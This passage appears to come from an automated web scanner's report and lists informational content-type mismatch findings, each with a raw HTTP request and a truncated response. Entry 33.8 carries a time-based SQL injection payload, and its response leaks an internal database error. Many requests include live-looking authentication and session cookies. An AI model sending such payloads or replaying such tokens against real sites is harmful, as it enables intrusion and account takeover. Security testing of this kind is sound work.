function getRADIds() { return{"adid":"65000000000015128","pid":"7932771","targetid":"37389090"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 160, 600);if(pare
...[SNIP]...
33.7. https://broker.gotoassist.com/javaScriptTester.tmpl  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://broker.gotoassist.com
Path:   /javaScriptTester.tmpl

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /javaScriptTester.tmpl?SessionInfo=237918117:6229CD39A2E2A4C&Portal=lbmc&enabled=true&screenWidth=1920&screenHeight=1156&windowWidth=1066&windowHeight=925&javaEnabled=false HTTP/1.1
Host: broker.gotoassist.com
Connection: keep-alive
Referer: https://broker.gotoassist.com/h/lbmc?Portal=lbmc&Target=ds%2FqueryPost.flow&Template=ds%2FphoneModeRedemption.tmpl&JavaScript=true&Form=lbmcSmartPage&Name_Full=&CompanyName=&Question=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dtsSession=SessionInfo%3D237918117%253A6229CD39A2E2A4C

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:43:54 GMT
Server: Apache
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

OK
33.8. http://dce.sapha.com/engine.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /engine.php?ac=-111'%20OR%20SLEEP(25)=0%20LIMIT%201-- HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 412

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0
...[SNIP]...
33.9. https://events.gsmiweb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://events.gsmiweb.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:38:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 22 Nov 2010 07:29:07 GMT
ETag: "d81144-9f6-361c36c0"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...
33.10. http://expedia-www.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://expedia-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=expedia&code=www&timeout=undefined&onFailure=undefined HTTP/1.1
Host: expedia-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:299-UVO-511&token:_mch-baynote.net-1304554578579-88775

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:33:41 GMT
Content-Length: 77363


                           baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...
33.11. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fpdownload2.macromedia.com
Path:   /pub/shockwave/cabs/flash/swflash.cab

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /pub/shockwave/cabs/flash/swflash.cab HTTP/1.1
Accept: application/x-cabinet-win32-x86, application/x-pe-win32-x86, application/octet-stream, application/x-setupscript, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fpdownload2.macromedia.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 12 Apr 2011 23:39:49 GMT
ETag: "123408-2b0224-353a7b40"
Accept-Ranges: bytes
Content-Length: 2818596
Content-Type: text/plain
Date: Sat, 07 May 2011 01:47:44 GMT
Connection: close

MSCF......*.....D.............................*.................X..............;.s .swflash.inf...+........>e. .FP_AX_CAB_INSTALLER.exe...R..@..[...
..QV."C`3.........(d
...BX!..U.hm\n...
Ra...Y.i.
...[SNIP]...
33.12. http://hmficweb.hinghammutual.com/images/leftcolumn/photo-agents.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hmficweb.hinghammutual.com
Path:   /images/leftcolumn/photo-agents.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/leftcolumn/photo-agents.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: hmficweb.hinghammutual.com

Response

HTTP/1.1 200 OK
Content-Length: 219417
Content-Type: image/jpeg
Last-Modified: Thu, 09 Mar 2006 20:28:56 GMT
Accept-Ranges: bytes
ETag: "88cea16b843c61:1690"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:36:26 GMT

.PNG
.
...IHDR......./.....HqS.....gAMA....|.Q.... cHRM...........R...@..}y......<.....s<.w..
5iCCPsRGB IEC61966-2.1..H...wTT.....wz..0..z..0... ..Q.f......Ml..@D...E......H..b!(.`.H.Pb0...dF.J|yy..
...[SNIP]...
33.13. http://learn.bridgefront.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://learn.bridgefront.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:58:23 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
ETag: W/"1406-1302518292000"
Last-Modified: Mon, 11 Apr 2011 10:38:12 GMT
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@...................................JJJ.........eee.............WWW.ttt.........^^^.................nnn.....RRR.yyy.............iii.}}}.............MMM.......
...[SNIP]...
33.14. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.expedia.com
Path:   /media/content/expus/graphics/home/wiz/wizard_booking_image.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /media/content/expus/graphics/home/wiz/wizard_booking_image.gif?01AD=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg&01RI=929884BBD25FA5E&01NA= HTTP/1.1
Host: media.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; U9Z5=CT-1; bn_u=UNASSIGNED

Response

HTTP/1.1 200 OK
Content-Length: 6764
Content-Type: image/gif
Last-Modified: Tue, 29 Mar 2011 15:31:23 GMT
Accept-Ranges: bytes
ETag: "801725c26eecb1:0"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=900
Date: Fri, 06 May 2011 22:34:07 GMT
Connection: close
Set-Cookie: U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; expires=Fri, 03-Jun-2011 22:34:07 GMT; path=/; domain=.expedia.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR.......k.....(.-P...3IDATx..]    tU..>ku....v|...    ....V......^.g...
b..Je..0CH@D.......H.......A.... .j.X[[..Z...>.?.w.}nN..Mn..k}.s.......g...-Kk#..&^..)]...e......r...Q.V.62c.x!...4.q..
...[SNIP]...
33.15. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1659&ref2=elqNone&tzo=360&ms=488 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.secureworks.com/compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:24:03 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
33.16. http://poll.websitegear.com/compactpoll.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://poll.websitegear.com
Path:   /compactpoll.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /compactpoll.asp?pollID=18420 HTTP/1.1
Host: poll.websitegear.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:30:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5310
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSACSQBTS=BCHAMOBCMMIPKJJCLMLBENKA; path=/
Cache-control: private


function showVote18420(){
var valSelected = false; var voteForm18420 = document.getElementById('WGPoll18420');
var options = document.getElementsByName
...[SNIP]...
33.17. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSA3&AP=1090 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; FC05=FB=AgEAtw4P67gB; FC01=FB=AgEAuQ5ZB8gB; FC06=FB=AgEAvQ6Q8uwB; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC08=FB=AgEAvw4O/vgB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MSNRPSAuth=FAASARTFnW1j7R/2XIZB3mHe3d77E4hN8gNmAAAEgAAACBXYMoVREhyX0ADLEJLRiPILXfTnhyCvz9Go%2BL7ambo5dBf6RPTXNt11NoFy1AJuaoT0T2TxOAfGJcKG/wWHoMkWH3wqP/QN4jo1m7%2BNAdM3RHhQe8kiYltNKWPKkGejQZdl3uqmHRAAJQRYkMgp%2Bk0igKH1uU7%2BaR1w286L%2BYfi4CaaklOll/V2B7ivbPIflLPVJp/6vrubl9M4NrNx0QrX2G/gGs2ld4fHZkFuMyfd4%2BjMWtYCICZPYlmSFBwzjujFs8NWYS3WQmeL0gTh5CIQsx9kx17vsdPAFADz38T8NSgH2c2NxW8mM2p59qrjpw%3D%3D; MSNRPSShare=1; MSPAuth=9ZS6z9CnTHW6nQVLn69F5g6Kq1ZGc3ZrwOlg*roxIBmxDiYnXGxD!lZbQ3NaDTBICmclo916XIZmzbCt239s9!ofrljHmXARncTrTBhSXE5HYpO4CvzewYRcgboqrT6F63; MSPProf=9ng3Qj0dWDBgjckYbAydF4TeuPZIEqjRUAIQsjQC8bD7wSE7YcBkffxuAYa*5hFyfmsZw0z5iSAqmoJrRbBKbwEfaqa8N2YTDV8M*Hh!5oVibmYhBosajfilIcF947gI11Ahkt99*Z2rSzijfj!a0ur7*saIB9TO0cdTX34uzM5!JKmnlQDSL8Hw$$; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=TyTLJiYHPCovH3I7fPvWG8WWgxnFbQpamGFpO0Bcx8odiqKu6YYGUQ&W=1; Sample=37; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 841
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8265690-T8277539-C81000000000044034
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 19:30:46 GMT
Content-Length: 841


//<![CDATA[
function getRADIds() { return{"adid":"81000000000044034","pid":"8265690","targetid":"8277539"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 160, 600);}
t
...[SNIP]...
33.18. http://sales.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=56727252 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198; ASPSESSIONIDQAAASBQA=ANKDKPNBJPKBNENOBMHMELBD

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=56727252
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:20cf"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:21:28 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...
33.19. http://seal.globalsign.com/SiteSeal/gs_image_130-65_en.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://seal.globalsign.com
Path:   /SiteSeal/gs_image_130-65_en.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /SiteSeal/gs_image_130-65_en.js HTTP/1.1
Host: seal.globalsign.com
Proxy-Connection: keep-alive
Referer: http://www.firehost.com/secure-hosting/pci?_kk=PCI%20compliance%20scanning&_kt=538c084f-5d5b-43c7-83f9-c71a7300c9e6&gclid=CLyMisrV1KgCFQNx5Qodz0X8fA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:05 GMT
ETag: W/"1691-1295902468000"
Last-Modified: Mon, 24 Jan 2011 20:54:28 GMT
Content-Type: text/javascript
Content-Length: 1691
Connection: Keep-alive
Via: 1.1 AN-0003011042473034

<!--

ss_ua = navigator.userAgent.toLowerCase();
ss_opera = window.opera;
ss_msie = (!ss_opera) && (ss_ua.indexOf("msie") != -1);
ss_msie4 = (!ss_opera) && (ss_ua.indexOf
...[SNIP]...
33.20. http://st.madisonlogic.com/images/userlogo/2/2437_Viewfinity_Logo-150x50.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://st.madisonlogic.com
Path:   /images/userlogo/2/2437_Viewfinity_Logo-150x50.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/userlogo/2/2437_Viewfinity_Logo-150x50.jpg HTTP/1.1
Host: st.madisonlogic.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:31:00 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 28 Sep 2010 14:23:10 GMT
ETag: "5dc115-1937-9598af80"
Accept-Ranges: bytes
Content-Length: 6455
Connection: close
Content-Type: image/jpeg

.PNG
.
...IHDR...s...&.............sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs...}...j..7.I....IDATx^.[.[.g.5...s.....)F#.....r...RTP#b...D.M..#v.....X.&.).....k...
...[SNIP]...
33.21. http://st.madisonlogic.com/images/userlogo/2/2931_Arbor_Logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://st.madisonlogic.com
Path:   /images/userlogo/2/2931_Arbor_Logo.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/userlogo/2/2931_Arbor_Logo.jpg HTTP/1.1
Host: st.madisonlogic.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:31:00 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 24 Feb 2011 16:33:14 GMT
ETag: "5dd35c-1bdf-c51b2680"
Accept-Ranges: bytes
Content-Length: 7135
Connection: close
Content-Type: image/jpeg

.PNG
.
...IHDR...s...)......V.w....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs..    ...    ..m..n...HIDATx^.[    tTU..Gp...v.6-...".(.....y.m..;". @.Z.AD..A@Q&...Bd..aL.$aH.
...[SNIP]...
33.22. http://st.madisonlogic.com/images/userlogo/3/3189_HP_S64_Logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://st.madisonlogic.com
Path:   /images/userlogo/3/3189_HP_S64_Logo.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/userlogo/3/3189_HP_S64_Logo.jpg HTTP/1.1
Host: st.madisonlogic.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:31:00 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 02 May 2011 15:48:10 GMT
ETag: "5dd14c-2ae0-f34d8280"
Accept-Ranges: bytes
Content-Length: 10976
Connection: close
Content-Type: image/jpeg

.PNG
.
...IHDR...s.../........j....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs...........~...*IIDATx^.|gXU...&9........_9)j.......c..Fc..*6T@@.a.,...k4V..&..1v...Dz
...[SNIP]...
33.23. http://support.expedia.com/ci/ajaxRequest/getReportData  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.expedia.com
Path:   /ci/ajaxRequest/getReportData

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

POST /ci/ajaxRequest/getReportData HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/answers/list/
Origin: http://support.expedia.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; supportsurvey=1; MC1=GUID=cc3450d747f3e2d59e058691af6ba2d1; s1=`user=v.8,0,EX01208381BC$0E$F3203000$BD$2E$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$220$0D!50$97$8B$7DB$8A$D8$F42$82$AB$89$FB!e02000`135; p1=`accttype=v.2,3,1,EX01EF947B7C$D1$25$DD$0C$FD$A0Y$B3$7D8$95B$1C$91$5DIR$81$2Al$1C$86$5D$CDU$2Cv$7B$8A`tpid=v.1,1`gacct=v.1,1,215819729`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`196; COOKIECHECK=1; cp_session=UylTJ1AkVHBUPFUlBG5SBA5zVS1cWVRqBXdYa1R0B30AclQoUXcDOg50B3MAclMgUnJXaQd2VG8AJgU%2FV3ZRcQp8WyZRYAMUVSBTaFETBiBTYFNDUCBUJVRxVSkEMlIrDnpVYlxtVGkFYlguVDUHPgA9VHhRZwNGDn8HJABlU3BSMldDBzVUMgBhBTlXdlErCmhbb1E%2FA3BVNlMcUSQGdlMxU3dQclRhVEJVYQQ7UjYOclUiXDtUNgVwWHVUNAc8AHVUblERAzEOKgdjADFTNlJpV3EHLVRwADcFE1dDUVAKX1smUWEDY1VmUzNRIQZhU3dTNlATVBZUUlVQBHJSYQ48VWNcaFR0BWZYMVRzB2IAFFR4UWcDNg5iBz8Ac1M9UiVXNgcQVGAAIQVlV0RRNAopWzFRFQNnVTVTa1FkBiBTYFMzUCVUNVR1VXMEclJgDk5VNlwsVDIFNVhyVDEHNAA0VHhRZgNEDj4HYQAiU2dSNldjByxUJgBwBXJXMVFBCjxbJlFhA2NVaVM1UTQGYVN3UzZQE1RjVCNVNQRhUjAOS1VjXHxUJQUwWERUZwd0AGJUa1EnA2YOfQcjACJTZlJEVygHYFRnAD0FclcxUUMKLlt%2BUX8Dd1VgU3hRbwYnUw5TKlAkVDdUdVV0BD5SPA5kVVtcJlRMBTBYTlQmBwsAE1RlUWADVg48BzoAdlMAUkdXdQdkVDQAcwVqVz9RJwpx; 